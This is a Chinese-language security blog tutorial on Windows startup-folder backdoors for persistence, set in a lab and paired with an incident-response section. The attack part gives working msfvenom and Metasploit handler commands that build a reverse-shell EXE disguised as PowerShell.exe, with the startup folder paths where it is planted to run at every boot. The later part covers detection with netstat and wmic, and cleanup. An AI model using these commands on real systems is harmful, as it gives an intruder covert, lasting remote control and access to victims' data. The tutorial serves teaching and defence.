🍬 博主介绍

👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~
✨主攻领域：【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限，欢迎各位大佬指点，相互学习进步！

1.5.1 启动项后门介绍

1.5.1.1 简介

Windows启动项后门是指攻击者通过修改系统设置，使得在每次计算机启动时自动执行特定的恶意程序或脚本，从而实现对目标系统的持续控制。这种后门通常用于在攻击者获得初始访问权限后，确保他们可以长期保持对系统的控制权，即使系统重启也不会丢失访问权限。

1.5.1.2 原理

Windows启动项后门的原理基于操作系统的启动过程。在Windows系统中，有一些特定的文件夹和注册表项会在系统启动时被自动加载和执行。攻击者可以通过在这些位置添加恶意程序或脚本，使它们在系统启动时自动运行。

1.5.1.3 实现步骤

生成后门程序：使用工具如Metasploit生成一个EXE类型的后门木马。
放置后门文件：将生成的后门文件放置在系统启动文件夹中，例如C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp或用户级的启动文件夹C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。
隐藏后门文件：为了提高隐蔽性，可以使用文件隐藏技巧对后门文件进行隐藏处理。
添加自启动服务：将后门程序注册为服务，并设置为自动启动，这样即使在没有用户登录的情况下，后门程序也会运行。
利用组策略：通过组策略添加启动脚本，利用组策略的自启动策略来加载后门文件。
注册表自启动：修改注册表中的自启动键值，添加后门程序的路径，使其在系统启动时自动运行。

1.5.1.4 防御措施

定期检查启动项：定期检查系统的启动文件夹和注册表中的自启动项，删除不明或可疑的程序。 使用安全软件：安装可靠的杀毒软件和防火墙，定期更新病毒库和系统补丁，以减少恶意软件感染的风险。 限制权限：对于敏感操作，如修改注册表和启动文件夹，应限制只有管理员权限的用户才能执行。 监控网络连接：使用命令如netstat -ano`查看异常网络连接，通过PID号查找并终止可疑进程。
文件完整性监控：使用文件完整性监控工具，监控关键系统文件的变化，及时发现并响应潜在的威胁。

1.5.1.5 应用场景

权限维持：在成功入侵目标系统后，攻击者通常会植入后门程序，以便在系统重启后仍然能够保持访问权限。
远程控制：通过后门程序，攻击者可以在不被察觉的情况下远程控制目标系统，执行各种恶意操作。
数据窃取：后门程序可以用于定期收集并发送目标系统的敏感数据，如密码、个人信息等。
持久化攻击：通过不断更新和隐藏后门程序，攻击者可以实现对目标系统的长期控制，难以被发现和清除。

1.5.2 启动项后门创建实战

1.5.2.1 启动项后门演示

1.5.2.1.1 前提条件

假设在攻击的过程中，我们通过利用各种getshell手段，不仅成功渗透进了目标服务器的防御体系，还进一步拿到了具有最高控制权限的administrator权限，这意味着我们已经能够完全掌控这台服务器，可以执行任何我们需要的操作。这时候我们需要进行权限维持，从而创建各种后门，包括我们这里讲到的启动项后门。

1.5.2.1.2 环境介绍

靶机： windows 10
IP： 10.0.0.158
攻击机： kali
IP： 10.0.0.128

1.5.2.1.3 利用MSF生成一个EXE类型的后门木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -f exe -o PowerShell.exe 

1.5.2.1.4 MSF 启动监听

在kali上监听端口55555，重启windows10之后马上就接收到目标机弹回来的shell

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.128
set lport 55555
run

1.5.2.1.5 将后门放在 Windows启动项

「开始」菜单 是Windows计算机在启动时都会访问到的路径，那么将PowerShell.exe后门文件放在启动项中，那么服务器每次重启都会运行该后门，从而达到权限维持的目的
「开始」菜单启动项指示了启动文件夹的位置，具体位置如下，放那个位置都行，最好都放：

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup

1.5.2.1.6 重启 windows

目标机每次重启都会启动PowerShell.exe后门程序。

1.5.2.1.7 windows10权限丢失

shell成功反弹

1.5.3 启动项后门后门应急实战

1.5.3.1 查看网络连接

使用命令netstat -ano是可以查看到异常连接，重点查看ESTABLISHED连接。

netstat -ano

1.5.3.2 分析找到源头

通过PID号查找该进程文件所在的位置

wmic process get name,executablepath,processid|findstr 7456

发现异常程序所在位置：

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\wxiaoge.exe PowerShell.exe

1.5.3.3 应急处置

删除发现的恶意文件PowerShell.exe

c:\programdata\microsoft\windows\start menu\programs\startup\PowerShell.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\PowerShell.exe

并通过PID号强制杀掉进程的命令

taskkill /f /pid 2920

1.5.3.4 注意事项

如果黑客与win10机器没有处于连接状态，我们可以通过其他的一些分析手段进行分析，如使用Autoruns等启动项工具进行分析，也可以手工进行分析。
Autoruns 参考文章及工具获取：

https://blog.csdn.net/qq_51577576/article/details/130119164